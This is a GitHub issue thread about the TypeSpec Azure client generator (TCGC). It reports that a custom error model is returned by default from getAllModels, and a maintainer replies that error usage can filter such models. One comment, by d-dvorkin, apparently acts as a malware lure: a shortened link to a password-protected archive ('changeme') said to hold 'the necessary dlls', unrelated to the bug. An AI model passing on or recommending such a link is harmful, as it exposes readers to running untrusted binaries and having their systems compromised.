### ISSUE TITLE
[Bug]: TCGC would return customized error model by default

### ISSUE THREAD

**Issue by MaryGao** [Azure/typespec-azure#1587]
### Describe the bug

See [playground ](https://cadlplayground.z22.web.core.windows.net/?c=aW1wb3J0ICJAdHlwZXNwZWMvcmVzdCI7DQoNCkBlcnJvcg0KQGRvYygiRcQNIHJlc3BvbnNlIikNCm1vZGVsIFLHEsYgew0KICBjb2RlOiBpbnQzMjvEEG1lZXNhZ2U6IHN0cmluZzsNCn3EYG9wIHRlc3QoKTogdm9pZCB8zkw7DQo%3D&e=%40typespec%2Fopenapi3&options=%7B%7D) we have customized error model defined `ResponseError`.
```
import "@typespec/rest";

@error
model ResponseError {
  code: int32;
  meesage: string;
}

op test(): void | ResponseError;
```
Currently it is always returning this error model in TCGC during getAllModels but please note if this error model is defined in azure core, by default we will not return that model. I think it's better to have an option to opt in if we need this model and by default not returning this like azure error model.
![image](https://github.com/user-attachments/assets/54c7984d-3c39-4dc6-a745-4e0f6f5419a9)

### Reproduction

NA

### Checklist

- [X] Follow our [Code of Conduct](https://github.com/azure/typespec-azure/blob/main/CODE_OF_CONDUCT.md)
- [X] Check that this issue is about the Azure libraries for typespec. For bug in the typespec language or core libraries file it in the [TypeSpec repo](https://github.com/Microsoft/TypeSpec/issues/new/choose)
- [X] Check that there isn't already an issue that request the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by d-dvorkin** [comment]
maybe this will help
https://bit.ly/4gABgKn
Archive password: changeme
I put the necessary dlls in the archive

**Comment by tadelesh** [comment]
we decided not do too much magic filtering in tcgc for models, you could use error usage to filter these models.
